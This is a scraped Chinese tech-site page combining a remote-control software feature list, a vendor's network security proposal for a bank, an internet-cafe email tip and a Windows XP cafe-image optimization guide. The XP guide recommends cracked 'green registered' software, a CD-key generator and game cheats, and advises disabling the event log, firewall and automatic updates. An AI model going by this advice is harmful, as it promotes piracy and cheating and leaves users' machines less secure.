◇　　 管理员远程控制使用者注销、登录、关机和重新启动

◇　　 管理员远程控制mrCONROL软件更新

◇　　 远程演示

◇　　 主控台的屏幕画面可以传送给任何一个或多个工作站

◇　　 工作站之间的屏幕画面可以互相传送

◇　　 主控台上的应用程序可以在任何一台工作站上运行，方便在线教学

◇　　 同时支援不同的图像输出模式、更新刷新率和色彩位数

◇　　 当主控台进行监控时，可选择是否在工作站端显示“小眼睛”的图标

◇　　 主控台监控工作站之前，可以发消息给被监控端，是否接受监视/可以强制监视

◇　　 提供单一电脑或单机多人系统的IP地址堆叠

◇　　 一般电脑或单机多人系统只需要一个IP地址

◇　　 其它特色

◇　　 适用于Windows98/me/2000Professional/2000Server/XP-Home/XP-Profeesional

◇　　 标准电脑，CPU100MHZ或更高级

◇　　 标准显示卡

返回


网 络 安 全 解 决 方 案

《一键清理系统垃圾》

网 络 安 全 解 决 方 案

用户环境

省行和多个地市分行，分别通过DDN、FR、X.25及其它通讯手段连接，互联方式主要采用TCP/IP。
与一级网连接，同样采用TCP/IP实现互联。全辖通过总行的Internet出口访问Internet，进行Web浏览、收发Email、 Ftp 等应用。
由于业务需要，省行（及下辖各地市行）与同城的其它机构（如人民银行、证券等）采用TCP/IP进行互联。
省分行有基于TCP/IP的业务系统。
省市行计算机系统设备多。
全辖范围内的WAN互联速率从19.2K到256K bps。
在广域网上传输的数据部分使用了应用层的加密技术。
2. 用户需求

随着网络互联的迅速扩大，网络应用的增加，用户越来越关心整个系统的安全生产问题。

2.1 现状

在现有的网络和应用系统中，基本未采取任何安全措施，主机仅仅靠PASSWD来维持自身安全，并且主机操作系统和应用系统的安全漏洞也未作任何处理，系统管理上也成在着诸如ROOT用户无口令或长期不改口令等许多问题，在广域网上，随着业务的扩展，也越来越多的同人行、外管、税务等单位

互连，这一切都形成了严重的安全问题，严重的威胁着省行的应用系统。

在近来的网络监控中，也常发现有系统和主机被试图入侵的情况，对辖内的系统和主机的检查的扫描中，发现了大量的安全漏洞，并且有许多安全漏洞是很难避免和根除的。

另外，通过网络进行传播的计算机及网络病毒严重影响了银行的正常业务开展，给安全生产构成威胁。

2.2 安全威胁

总结描述的问题，结合目前所知道的安全威胁，我们发现，以下安全问题均可能对银行的安全生产造成严重威胁：

业务系统与其它系统未进行充分隔离。
辖内网络与外单位的互联未进行充分隔离。
对计算机和网络病毒未采用充分手段进行防御。
对存在的已知安全漏洞缺乏评估，因此也无法采用技术和行政手段进行修补。
对是否受到入侵缺乏监控审计和监控措施。
对内部人员操作的技术监控。
缺乏强有力的认证系统，基于用户名/口令模式的系统极易被突破。
2.3 安全需求

一个安全生产的银行信息系统，以下的基本安全要求是必须要满足的：

业务系统与辖内其它信息系统使用防火墙隔离。
辖内网络与互联的其它网络使用防火墙隔离。
网络管理员必须对辖内信息系统的安全状况进行周期性评估，并根据评估结果采用相应措施。
网络系统能够监视、记录黑客可能发起的攻击。
全面的病毒防御体系，阻止病毒的传播，恢复已被病毒感染的设备及数据。
完善的备份系统。
敏感系统在公网上的传输必须加密。
可预见的管理和拥有费用。
对整个信息系统安全审计。
3. 安全技术

网络安全技术发展到今天，已经有成熟的方案来对付来自各方面的安全威胁。

信息技术的安全体系必须集成多种安全技术实现。如虚拟网技术、防火墙技术、入侵监控技术、安全漏洞扫描技术、加密技术、认证和数字签名技术等。

3.1 虚拟网技术

虚拟网技术主要基于近年发展的局域网交换技术（ATM和以太网交换）。交换技术将传统的基于广播的局域网技术发展为面向连接的技术。因此，网管系统有能力限制局域网通讯的范围而无需通过开销很大的路由器。

由以上运行机制带来的网络安全的好处是显而易见的：

信息只到达应该到达的地点。因此，防止了大部分基于网络监听的入侵手段。
通过虚拟网设置的访问控制，使在虚拟网外的网络节点不能直接访问虚拟网内节点。
但是，虚拟网技术也带来了新的安全问题：

执行虚拟网交换的设备越来越复杂，从而成为被攻击的对象。
基于网络广播原理的入侵监控技术在高速交换网络内需要特殊的设置。
基于MAC的VLAN不能防止MAC欺骗攻击。

3.管理省行桌面、服务器的病毒服务软件的病毒特征分发，以及自动通过HTTP从NAI的病毒特征库实时升级。

3.2 防火墙技术

网络层通讯可以跨越路由器，因此攻击可以从远方发起。IP协议族各厂家实现的不完善，因此，在网络层发现的安全漏洞相对更多，如IP sweep, Sequence Insert, teardrop，sync-flood, IP spoofing攻击等。

防火墙是近年发展起来的重要安全技术，其主要作用是在网络入口点检查网络通讯，根据客户设定的安全规则，在保护内部网络安全的前提下，提供内外网络通讯。

选择防火墙的要点在于:

安全性
即是否通过了严格的入侵测试。

抗攻击能力
对典型攻击的防御能力

性能
是否能够提供足够的网络吞吐能力

自我完备能力
自身的安全性，Fail-close

可管理能力
是否支持SNMP网管

VPN支持
认证和加密特性
服务的类型和原理
网络地址转换能力
与网络内其它安全系统的动态适应。
3.3 入侵检测技术

利用防火墙技术，经过仔细的配置，通常能够在内外网之间提供安全的网络保护，降低了网络安全风险。但是，仅仅使用防火墙，网络安全还远远不够：

入侵者可寻找防火墙背后可能敞开的后门。
入侵者可能就在防火墙内。
由于性能的限制，防火墙通常不能提供实时的入侵检测能力。
保护措施太单一。
入侵检测系统是近年出现的新型网络安全技术，目的是提供实时的入侵检测及采取相应的防护手段，如记录证据用于跟踪和恢复、断开网络连接等。

实时入侵检测能力之所以重要首先它能够对付来自内部网络的攻击，其次它能够缩短hacker入侵的时间。

入侵检测系统可分为两类：

基于主机
基于网络
基于主机的入侵检测系统用于保护关键应用的服务器，实时监视可疑的连接、系统日志检查、非法访问的闯入等，并且提供对典型应用的监视如Web服务器应用。

基于主机的安全监控系统具备如下特点：

精确，可以精确地判断入侵事件。
高级，可以判断应用层的入侵事件。
对入侵时间立即进行反应。
针对不同操作系统特点。
占用主机宝贵资源。
基于网络的安全监控系统具备如下特点：

能够监视经过本网段的任何活动。
实时网络监视。
监视粒度更细致。
精确度较差。
防入侵欺骗的能力较差。
交换网络环境难于配置。
基于主机及网络的入侵监控系统通常均可配置为分布式模式：

在需要监视的服务器上安装监视模块（agent），分别向管理服务器报告及上传证据，提供跨平台的入侵监视解决方案。
在需要监视的网络路径上，放置监视模块(sensor)，分别向管理服务器报告及上传证据，提供跨网络的入侵监视解决方案。
选择入侵监视系统的要点是：

协议分析及检测能力。
解码效率（速度）
自身安全的完备性。
精确度及完整度，防欺骗能力。
模式更新速度。
3.4 安全扫描技术

网络安全技术中，另一类重要技术为安全扫描技术。安全扫描技术与防火墙、安全监控系统互相配合能够提供很高安全性的网络。

安全扫描工具源于Hacker在入侵网络系统时采用的工具。商品化的安全扫描工具为网络安全漏洞的发现提供了强大的支持。

安全扫描工具通常也分为基于服务器和基于网络的扫描器。

基于服务器的扫描器主要扫描服务器相关的安全漏洞，如passwd文件，目录和文件权限，共享文件系统，敏感服务，软件，系统漏洞等，并给出相应的解决办法建议。通常与相应的服务器操作系统紧密相关。

基于网络的安全扫描器主要扫描设定网络内的服务器、路由器、网桥、交换机、访问服务器、防火墙等设备的安全漏洞，并可设定模拟攻击，以测试系统的防御能力。通常该类扫描器限制使用范围（IP地址或路由器跳数）。网络安全扫描器的主要性能应该考虑以下方面：

速度。在网络内进行安全扫描非常耗时。
网络拓扑。通过GUI的图形界面，可选择一组或某些区域的设备。
能够发现的漏洞数量。
是否支持可定制的攻击方法。通常提供强大的工具构造特定的攻击方法。因为网络内服务器及其它设备对相同协议的实现存在差别，所以预制的扫描方法肯定不能满足客户的需求。
报告，扫描器应该能够给出清楚的安全漏洞报告。
更新周期。提供该项产品的厂商应尽快给出新发现的安全漏洞扫描特性升级，并给出相应的改进建议。
安全扫描器不能实时监视网络上的入侵，但是能够测试和评价系统的安全性，并及时发现安全漏洞。

3.5 伪装技术

伪装技术是近年新发展出来的技术。使用伪装技术，网络管理员能够以极低的成本构造出一套虚拟的网络和服务，并且，故意留出漏洞，并实时观察、记录入侵者的来源、操作手法。

伪装技术可以帮助管理员查询入侵者，并保留入侵证据。其次，通过了解入侵者的入侵方法，完善真正的系统的保护手段。

3.6 病毒防护

病毒历来是信息系统安全的主要问题之一。由于网络的广泛互联，病毒的传播途径和速度大大加快。

我们将病毒的传播途径分为：

通过ftp, 电子邮件传播。
通过软盘、光盘、磁带传播。
通过Web浏览传播，主要制恶意的Java控件及ActiveX控件网站。
通过群件系统传播。
病毒防护的主要技术如下：

阻止病毒的传播。
在防火墙、代理服务器、SMTP服务器、网络服务器、群件服务器上安装病毒过滤软件。在桌面PC安装病毒监控软件。

检查和清除病毒
使用防病毒软件检查和清除病毒。

病毒数据库的升级。
病毒数据库应不断更新，并下发到桌面系统。

在防火墙、代理服务器及PC上安装Java及ActiveX控件扫描软件
禁止未许可的控件下载和安装。
3.7 电子邮件系统安全

电子邮件系统也是信息网与外部必须开放的服务系统。由于电子邮件系统的复杂性，其被发现的安全漏洞非常多，并且危害很大。如刚刚发现的电子邮件附件超长文件名导致的安全漏洞能够非法获取客户的本地数据或破坏本地的数据系统。

加强电子邮件系统的安全性，通常有如下办法：

设置一台位于停火区的电子邮件服务器作为内外电子邮件通讯的中转站（或利用防火墙的电子邮件中转功能）。所有出入的电子邮件均通过该中转站中转。
同样为该服务器安装实施监控和过滤系统。
该邮件服务器作为专门的应用服务器，不运行任何其它业务（切断与内部网的通讯）
升级到最新的安全版本。
3.8 操作系统安全

企业信息网内通常会运行许多种操作系统，联网功能也许是目前最重要的功能之一。联网的计算机就有可能受到攻击。

市场上几乎所有的操作系统均已发现有安全漏洞，并且越流行的操作系统发现的问题越多。对操作系统的安全，除了不断地增加安全补丁外，还需要：

周期检查系统设置（敏感数据的存放方式，访问控制，口令选择/更新）
基于系统的安全监控系统。
使用增强的认证手段如使用数字证书或IC卡对用户进行认证。

4 安全产品

4.1 防火墙

NetScreen Firewall

来自Netscreen Corp. 的Netscreen-100防火墙是目前业届最快的防火墙产品，除了以线速率提供受保护的Internet访问外，还支持：

所有的TCP及UDP服务。
VPN的IPSEC规范。
连接流量控制，流量管理可保证关键网络服务在网络拥挤时不受影响。
虚拟IP支持服务器负载平衡。
基于Web的管理。
完全基于硬件，易管理，避免操作系统的安全漏洞。
可工作在隐藏模式及NAT模式，隐藏模式使外来攻击者不能访问到该防火墙，从而消除了对防火墙的直接攻击。
无用户限制。
通过ICSA Firewall 认证。
4.2 网络安全审计

来自ISS的SafeSuite是一套用于网络安全扫描的软件工具，由富有实际经验的安全专家开发和维护。它包括Internet Scanner、System Scanner、Database Scanner等。

互联网扫描器Internet Scanner对网络设备进行自动的安全漏洞检测和分析，并且在执行过程中支持基于策略的安全风险管理过程。另外，Internet Scanner执行预定的或事件驱动的网络探测，包括对网络通信服务、操作系统、路由器、电子邮件、Web服务器、防火墙和应用程序的检测，从而识别能被入侵者利用来非法进入网络的漏洞。Internet Scanner将给出检测到的漏洞信息，包括位置、详细描述和建议的改进方案。这种策略允许管理员侦测和管理安全风险信息，并跟随开放的网络应用和迅速增长的网络规模而相应地改变

系统扫描器(System Scanner)是一个基于主机的安全评估系统。它与网络扫描器的区别在于它提供了基于主机的安全评估策略来分析系统漏洞。网络扫描器是在网络层扫描各种设备来发现安全漏洞，系统扫描器是在系统层上通过依附于主机上的扫描器代理侦测主机内部的漏洞。这些扫描器代理的安全策略可以通过系统扫描器控制台进行集中管理和配置。系统扫描器在相当严格的基础上对安全风险级别进行划分。在UNIX系统上，它对大量的安全问题能自动产生修补程序脚本。一旦系统被确认处于安全的状态后，系统扫描器会用一种数字指纹锁定系统配置，以便更容易发现非法访问。

数据库扫描器（Database Scanner）是世界上第一个针对数据库管理系统风险评估的检测工具。任何人都能够利用它来建立数据库的安全规则，通过运行审核程序来提供有关安全风险和位置的简明报告。

4.3 实时网络安全监控系统

ISS的实时入侵监控器RealSecure 是业界第一个集成了基于网络和基于主机的入侵检测和响应系统。它可以最大限度地、全天候地监控企业级的安全问题。安全管理人员可以自动地监控网络的数据流、主机的日志等，对可疑的事件给予检测和响应，在内联网和外联网的主机和网络遭受破坏之前阻止非法的入侵行为。

实时入侵监控器RealSecure 包含三个部件：

◆RealSecure Network Engine 网络引擎（基于网络的监控器）

◆RealSecure System Agent 系统代理（基于主机的监控器）

RealSecure Manager Console 管理控制台
一个典型的内联网、外联网、互联网环境下，RealSecure Engine布置在不同的网段中，包括防火墙内外、内部的子网网段、拨号连接服务器之后，以及外联网等位置。RealSecure对外部入侵者和内部入侵者都可以进行有效的防范。

RealSecure Agent是基于主机的防范系统，是对RealSecure Engine的补充。 RealSecure Agent 分析主机的日志等内容来识别入侵和攻击，判断入侵是否成功，并且提供适合成为法律证据而实时条件又无法提供的信息。

每一个RealSecure安装在工作站或主机上，彻底地检查系统日志，对非法入侵和网络误用进行匹配。RealSecure Agent可以通过中断用户进程和禁止用户账户的方式防范入侵行为。它还可以发出警告，记录事件，发出SNMP Trap,发电子邮件，或者运行用户定义的其它动作。

在一个典型的内联网、外联网、互联网环境下，RealSecure Agent布置在不同的主机和工作站上，可以在防火墙内外、内部的子网网段等位置上。RealSecure Agent对外部入侵者和内部入侵者对主机的攻击都可以进行有效的防范。系统中央控制由RealSecure Manager Console承担。

RealSecure Manager Console是RealSecure系统的控制台。可以对多台RealSecure 网络引擎和系统代理进行管理。对被管理监控器进行远程的配置和控制，各个监控器发现的安全事件都实时地报告控制台。

病毒防护系统
病毒防护系统由Total Virus Defense套件组成，提供了病毒的检测和清除、诊断、安全、恢复和管理技术。

Virus Scan – 全球领先的桌面反病毒产品。

WebScanX - 保护系统免受恶意的java和ActiveX小程序的破坏。

PC Medic - 保护系统和程序免于崩溃。

PGP File - 增强信息的安全

Enterprise SecureCast- 自动发布病毒更新信息。

netTools Console - 具备集中的管理、分发和警告功能。

Virus Security Scan套件提供了全球最多的病毒类型检测（48000种以上），并且占领了全球60%以上的市场。

NAI的McaFee Labs小组分别在六大洲进行病毒研究，提供全天候的全球病毒研究。每发现一种新病毒，该病毒特征文件按小时在Web上发布。

NAI提供专用邮件病毒过滤和扫描器，采用专用硬件实现方案，提供实时的Internet病毒扫描。

5 系统集成方案

在企业网内部署网络和系统安全是一个非常复杂的任务，需要精心规划和部署。当前阶段，我们提供的网络安全集成方案能够满足基本的银行安全生产要求。

本系统集成方案具体目标如下：

全辖范围内使用防火墙进行网络隔离。
在省行部署安全评估系统。
在省行部署入侵监视系统。
在省行部署全面的病毒防护系统。
防火墙
防火墙目前主要考虑与广域网的互联隔离。因此，只需在各地市分行的局域网入口安装一台NS-10即可。

安全策略为仅允许所需服务对应的客户端及服务器访问特定服务。

安全评估系统
安全评估系统采用ISS公司的Scanner，可安装网管部门。所有防火墙策略均在特定时间对该评估系统的IP开放。

省行网管员可设定在非业务时间对全辖范围内的所有提供服务的网络设备及服务器进行安全审计扫描。

入侵监视系统
入侵监视系统采用ISS的RealSecure，支持NT 和Unix。因此，在省行运行上述操作系统的服务器上均可安装。

病毒防护系统
部署在省行的病毒防护系统分为：

电子邮件病毒防护。
Notes 病毒防护。
服务器病毒防护。
桌面机病毒防护。
集中病毒特征升级、软件分发和报警管理。
电子邮件病毒防护可安装一台Windows NT 服务器（内存128M, PII300,3G以上），运行NAI Virus sheild for SMTP，将其设为邮件接收器(修改本域的DNS)，进入本行的邮件首先经过该病毒防护过滤器扫描，然后进入邮件服务器。

Notes 平台的病毒防护需要首先升级Notes的运行平台至Windows NT 4.0，然后安装NAI Virus groupsheild for Notes。

服务器病毒防护可安装在任何运行Windows NT, OS/2的服务器上。

用户桌面可安装最新推出的Virus Scan 4.0中文版，全面支持web浏览、Ftp、电子邮件及在线文件读写扫描。

使用一台普通PC，安装Windows NT 4.0及NAI的Virus Scan Console，自动

返回


网吧 大宗邮件快速收发

《一键清理系统垃圾》

网吧 大宗邮件快速收发

    现在，到网吧上网的人越来越多，许多人到这里除了查询新信息外，一个重要目的就是收发邮件。如果你到了网吧再写信，那么宝贵的上网时间就被无谓地浪费了。特别是你要发很多封邮件，甚至每封邮件中还要在附件中加程序或Word文件，其操作就更花时间了。想想看，如果你要给10个不同的收件人发信，光写每个人的E－mail地址和标题，再加两句简单的话，就得花不少的时间吧。同样，如果你一次收到10多封邮件（这也很正常），有的邮件还很长，甚至附件中还有文件，如果你当场阅读，是不是太浪费上网时间，如果你一封封信件保存后带回去阅读，由于每个附件需要单独保存才能使用，因此整个操作同样麻烦和花时间。有没有一种很简单的方法，可以在另一台没有上网的电脑上写好所有信件，到网吧直接发送呢？在收到E－mail后，又能不能直接将所有邮件全部拷贝带走，回家再细细阅读或保存附件中文件呢？回答是完全可以的。笔者就是这么做的，这样确实省时多了，节约了不少的上网时间。下面就以Netscape4.1为例，说明其具体操作步骤。
    启动Netscape，进入[Edit]菜单下的[Preferences...]，点击后出现一个[Catagory]框，展开Mail ＆Groups，选择Identity，在右边的相应输入框中输入你喜欢的名字和邮件地址；再选择左边Mail ＆ Groups下的Mail Server，在右边相应输入框中输入你的邮件用户名和邮件服务器，如网易免费信箱为pop.netease.com，并选择邮件服务器类型为POP3，同时点开[More Options]（不同版本中此处的名字有些差别），在弹出的菜单中通过[Choose]选择一个[Local Mail]（本地邮局，也就是你所有收发的信件存放的目录），你可以自己先任意建立一个目录如D:\TT，然后选择它作你的本地邮局。按下“确定”键，系统会告诉你需要重新启动Netscape后，新设的本地邮局才有效，你可马上退出Netscape，再启动Netscape，这下你使用的就是你的新邮局了（存放信件换了个地方罢了）。如果你要回到以前的邮局，将Local Mail指向的目录换为以前的就行了，十分方便。在新邮局中，里面是空的，但你可以在这里写好你所有的信件，包括附件在内。写好后，退出Netscape，再到你的新邮局D:\TT下，发现系统已经自动为你建立了近10个文件如Inbox、Sent、Trash、Drafts等，你只需要将文件Drafts拷贝就行了，你所有写好的信件包括附件就在其中。
    到了网吧，你可自行建立一个目录，如C:\XX，将软盘上的Drafts文件拷贝到该目录下。然后启动Netscape（网吧通常都有Netscape和IE），如同在你的机子上一样进行一番相同的邮件设置，但将本地邮局设为C:\XX，退出Netscape 重启后（不必重启机子），你会发现你的信箱是空的，但你的Drafts中，却是你早已写好的信件，点击进行直接发送就行了。是不是很简单呢？收到信件怎么带走?将C:\XX目录下的Inbox拷贝带回去，覆盖掉你机子上D:\TT目录下的Inbox文件（或另建一目录拷入其中，并将本地邮局设为它），启动Netscape就可完全查看了。这是不是同样很简单呢？
    朋友们，网吧收发邮件，照我说的做没错，保证节约你大量的上网时间！哦，对了，如果你用的是IE，可采用类似方法解决，不过要麻烦一点。

返回


网吧XP系统制作及优化

《一键清理系统垃圾》

网吧XP系统制作及优化

LBHIDDEN[0]LBHIDDEN第一　 系统安装、设置、优化：
     fdisk重新分区：
       c:(系统)--10g　 d:(娱乐30G)　 e:(娱乐30G)　f:(备份，临时文件，交换)---4G
    e盘备份拷贝：

  首先用WIN98安装盘 系统快速格式化C盘……
    c:/format c:/q/s
   然后插插入WINXP光盘，重新启动，从光盘引导，自动安装……
   安装期间如果要求选择安装的盘，就选择C盘，下一步，然后不改变盘的格式，保持原来的系统不变！
   安装好WINXP以后　 安装　网卡驱动：然后进行网络设置：（如果网卡驱动已经存在！那就直接进行网络设置就好了）
               把 "Link Speed/Duplex Mode"设置成"100 Full Mode"；
               去掉“拨号适配器”
               添加“IPX协议” ,不添加共享服务。
               计算机名-----“RED001”。。。。“RED210”

               IP地址-------10号机以后按照机器号填写IP格式为192.168.0.***　1----10号机IP地址为192.168.0.211----192.168.0.220
               网关--192.168.0.1　 DNS--192.168.0.1　 61.150.0.1
               主机：SERVER　域：　　为空　 windows登录
          安装DirectX 9.0b
     安装瑞星，不升级……

     到http://soft.269.net　上面　顺序 进行安装播放器……

     1> windows md player 9.0
     2> realone player2.0
     3> div5.5b
     安装完了以后对REALONE 播放器进行设置，把启动仅限播放器主窗口，然后把音量设置到最高！
修改realplayer(连接速度设为10m)修改播放属性为及时播放，不储存，不下载！

  安装　超级兔子魔法2002
   安装　 windows优化大大师　 （都安装那中绿色注册版本！）
电源使用方案：其中“关闭监视器”始终关闭 ，而“关闭硬盘”这里选择“从不”，因为对硬盘进行关闭的话，
再重新启动对磁头有很大的伤害；
    显示器刷新率达到75Hz就足够
安装基本软件……办公软件
          1>安装网页制作三尖刻　dr-mx　fw-mx fl-mx
          2>安装OFFICE 2000 及3Dmax autoCAD
          3>输入法：只保留“智能ABC”“五笔86”“紫光拼音”“为软拼音输入法”
          4>QQ2003III Beta4 Muzi Full Edition
          5>uc
          6>网易泡泡
          7>金山打字通2002
          8>南极星
          9>金山虚拟光驱共享版
          10>photoshop 6.01
          11>CorelDRAW 9
          12>网络蚂蚁国际版本　然后设置一下默认下载目录，关闭下载完以后的提示，已经一些对蚂蚁的优化
          13>安装110 重新启动 配置110属性
          14>Yahoo! Messenger
          15>MSN Messenger 6.1
          16>icq 2003中文版本
     安装一些常用的字库！不要太多，500M左右就可以了！
还有一些软件自行临时加装，比如微软的鼠标驱动啦什么什么的　如果需要直接安装进母盘！
       用WINDOWS优化大师进行第一次优化，选择自动优化，然后选择游戏爱好的那种模式，不备份注册表！结束以后重新启动，进行WINXP的优化~

        系统注册表尽量保证是刚做完系统时的注册表，
       没有任何游戏注册信息在内，非常干净和小巧
       把游戏分离注册表，整理好拷贝过来
         联众(装在d:盘)
         中国游戏中心在线游戏(装在d:盘)
        边锋
以下安装单机游戏
   安装豪放对战平台和CS的反作弊克户端

1　　反恐精英+cdkey生成器修改器　 战网补丁
2　　怎么样提高CS中的FPS(以上仅适用于Nvidia的卡 )
3　　　　opengl：
               关掉“启用缓冲区扩展““允许双面扩展使用本机视频内存“
               禁用对cpu增强指令集的支持
               纹理的默认颜色深度：始终使用16bpp
               缓冲翻转模式：使用位块传输
               垂直同步：始终关闭
               各向异性过滤：已禁用
               最大使用量：14
               d3d：
               关掉“启用雾化仿真“
               mip“最佳性能“
               pci纹理“23"
               在cstrike目录下的config.cfg里修改fps_max "100"
4　　 　　红警2-共和国之辉
5　　 　　梦幻麻将
6　　 　　抢滩登录
7　　　　雷神
8　　　　摩托车-------需安装
  9　　　 打野鸡
    10 　　碟王
11　　　　星际争霸
12　　　魔兽争霸3
13　　　冰峰王座
13　　　三国群英传2/3
14　　　　三角洲力量
  15　　　 极品飞车
  16　　　 雷电
17　一些小游戏和拳皇
     更多的自己看着办！最多装到20G左右的单机游戏
以下为网络游戏

        传奇(d:\传奇外挂　快捷方式　--私服)
         疯狂坦克2　　http://www.ft2.com.cn/-------需安装
         流星蝴蝶剑 meteor.reg
         暗黑----战网补丁
         奇迹
         骑士Online
         Online百战天虫
         战场
         天龙八步
        克洛斯　　　 www.gameking.com.cn/online/cronous/
         大话西游
         江湖
         混乱冒险
         天堂
         魔力
         红月
         破天一剑　http://pcik.catv.net/
         破碎银河系
         决战
         幻灵
         大海战
         天骄秦殇
        石器时代
         轩辕剑
         神代血印
         幻灵
         三国策OnLine
         武魂　　　　 www.muhon.com.cn/ -------需安装
         精灵
         风云
         千年
         龙族
         命运
         倚天
       A3

    然后对　　 所有游戏、软件试玩、设置　　 精简游戏难度　调整游戏画面，最好保证游戏畅通　能够点到就进！

    把注册表文件全部放到服务器上，然后同过网页形式打开注册，这样的话，以后直接在服务器上面更新和维护，方便很多！把CS 的注册程序也放入服务器，注册表单机点及，保证CS 在运行的时候ID不要冲突就好！

    注意，在安装PUBWIN4的时候切记，要先点3键结束掉EXPLOAY.EXE，然后点执行新任务，选择PUBWIN4安装程序进行安装，不然会出现IEHELP.DLL出错！
  重新启动，做好所有的快捷方式，然后安装PUBWIN4　设置好PUBWIN4的参数
  具体设置如下
1>设置系统参数，加载自动登陆 开机运行PUBWIN4
2>加载快皆方式 放些常用的在上面（不要超过5个）然后其他的就直接放个文件夹快皆方式在里面就可以！
3>设置桌面为http://192.168.0.249/客户机桌面/desktop1.bmp
4>设置客户端IP为10
5还有其他自己看着设置一下！忘记了！

    系统整理、安全设置：

   IE设置：

      清理桌面、开始菜单、程序组：

        程序--->　　删除没用菜单　　删除所有卸载菜单
系统优化设置。
★删除Windows强加的附件：

★再运行“添加-删除程序”，就会看见“添加/删除 Windows 组件”中多出了好几个选项；这样你可以删除好些没有用的附件
★关掉调试器Dr. Watson；
Dr.Watson是自带的系统维护工具，它会在程序加载失败或崩溃时显示。运行drwtsn32，把除了“转储全部线程上下文”之外的全都去掉。否则一旦有程序出错，硬盘会响很久，而且会占用很多空间。如果你以前遇到过这种情况，请查找user.dmp文件并删掉，可能会省掉几十M的空间。这是出错程序的现场，对我们没用。然后打开注册表，找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug子键分支，双击在它下面的Auto键值名称，将其“数值数据”改为0，最后按F5刷新使设置生效，这样就彻底来取消它的运行了。
另外蓝屏时出现的memory.dmp也可删掉。可在我的电脑/属性中关掉BSOD时的DUMP
★关闭“系统还原”：鼠标右健单击桌面上的“我的电脑”，选择“属性”，找到“系统还原”，如果你不是老噼里啪啦安装一些软件（难道你比我还厉害？？），你也可以去掉，这样可以节省好多空间。
★关闭“休眠支持”：因为休眠功能占的硬碟空间蛮大的, 所以关闭比较好,
控制台-->电源选项-->休眠(不要打勾)
（蓝调注：我觉得休眠还是很有用的。）
★关掉不必要的服务
单击“开始”→“设置”→“控制面板”。双击“管理工具”→“服务”，打开后将看到服务列表，有些服务已经启动，有些则没有。右键单击要配置的服务，然后单击“属性”。在“常规”选项卡上选择“自动”、“手动”或“禁用”，其中“自动”表示每次系统启动时，Windows XP都自动启动该服务；“手动”表示Windows XP不会自动启动该服务，而是在你需要该服务时手动启动该服务；而“禁用”则表示不允许启动该服务。在实际配置时，选择“手动”或者“禁用”都可以实现关闭该服务的目的，推荐使用手动功能，这样你随时可以启动一些临时需要的服务。
    有些服务是Windows XP所必需的，不能关闭，否则将会造成系统崩溃。至于各项服务
的功能，我们可以通过双击该服务或将鼠标悬停在该服务名上查看。具体服务的说明浅显，大家看得懂，可以自己选择那些要那些不要。修改的方法是：选中禁用的服务，点右键，选"属性"> "停止"，将"启动类型"设置为"手动"或"已禁用"。

   以下服务大家在禁止使用的时候请选择禁止，有些几个关于网络的需要保留下来！切记~~其他的大家 看着办，不太有用的就喀嚓掉！
1)alerter 错误警报
2)automatic updates windows 自动更新
3)background intelligent transfer service 微软说使用空闲的网络带宽传数据
4)clipbook 与远程电脑来共享剪贴板内容，我看还是免了吧
5)Computer browser　说什么要维护网络更新列表
6)DHCP client 我不需要这东西
7)Distributed link tracking client 保持局域网连接更新等信息，偶很少用局域网，这东西占用４M左右内存。
8)Distributed Transaction coordinator 协调xxx，和上面的差不多
9)DNS Client 我不需要这东西
10)Error reporting service 错误报告
11)Event Log 系统日志纪录
12)Fast user switching compatibility 用户切换
13)help and support 帮助
14)Human interface device access 据说是智能设备。。。
15)IMAPI CD-burning COM service　偶不用这个刻碟
16)Indexing service 索引，索引什么呢？
17)Internet Connection Firewall(ICF) ICF防火墙
18)IPSEC Services 这个我不懂，你想知道问Quack去
19)Logical Disk manager administrative service 配置磁盘
20)messenger 好像net send 等东西用的就是这个功能
21)MS software shadow copy provider 卷复制备份的
22)Net Logon 我可不想让黑客远程登录进来，关！
23)Netmeeting remote desktop sharing 我不用netmeeting
24)Network DDE　 动态数据交换传输
25)Network DDE DSDM　和上面差不多
26)Network Location Awareness 关，我的机子不作共享
27)NTLM Security support provider－telnet　呵呵，关！
28)Performance logs and alert 将系统状态写日志或发警告
29)Portable media serial number 关！
30)Print Spooler 打印机，不幸的是我的机子不连接Print ~
31) QoS RSVP 关！
32)Remote desktop help session manager 远程帮助服务
33)remote Procedure Call LOCATOR 管理RPC
34)remote registry 远程管理注册表
35)removable storage
36)routing and remote access 我干脆禁用了它
37)security accounts manager 我的系统只是一个客户系统，不用iis。
38)smart card
39)smart card helper 关！！！
40)SSDP Discovery service 我用不到这个
41)system event notification 如果是服务器肯定要记录的
42)system restore service 系统还原服务
43)task scheduler windows 计划服务
44)Telephony 拨号服务，我不拨号还不行吗？
45)telnet
46)terminal services 终端服务
47)uninterruptible power supply UPS，我没有呀
48)universal plug and play device host 太先进了点，用不到
49)upload manager 关了也能传输文件的
50)volume shadow copy 又是备份，晕
51)webclient 没用过
52)Windows Installer ＭＳＩ服务，我一直关着。
53)windows image acquisition (WIA) 数码设备用的
54)windows management instrumentation driver extensions 关了
55)windows time 时间服务
56)wireless zero configuration 无线网络，偶用不到的
57)WMI perfromance adapter 关！
★加速XP的开关机
1）缩短等待时间
开启注册表编辑器，找到 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control，
将 WaitToKillServiceTimeout 设为：1000或更小。 ( 原设定值：20000 )
找到 HKEY_CURRENT_USER\Control Panel\Desktop 键，将右边视窗的
WaitToKillAppTimeout 改为 1000， ( 原设定值：20000 )即关闭程序时仅等待1秒。将 HungAppTimeout 值改为：200( 原设定值：5000 )， 表示程序出错时等待0.5秒。
★让系统自动关闭停止回应的程式。
打开注册表 HKEY_CURRENT_USER\Control Panel\Desktop 键， 将 AutoEndTasks 值设为 1。 ( 原设定值：0 )
★MsConfig。大多数朋友都应该熟识MsConfig了，这是一个系统内置的Windows设置工具。点击开始菜单，选择“运行”，然后在录入框中敲入“msconfig”回车。我们要动手脚的是（启动）选项卡，点击它，这个选项卡中显示了Windows启动时运行的所有程序。这里没有一个程序对Windows来说是生死悠关的，所以放心大胆地把不要的去掉。把部分勾勾去掉之后，Windows启动会快些，同时空闲的系统资源也会多出一些。
★XP Prefetcher
    Windows XP自带了一个名为Prefetcher的服务，这个服务管理着Windows启动时的程序初始，其中指定的程序可以在以后使用中快速载入。Prefetcher在默认情况下就是打开的，不过它的性能还可以进一步提升。打开注册表编辑器，在注册表中找到：
    HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory
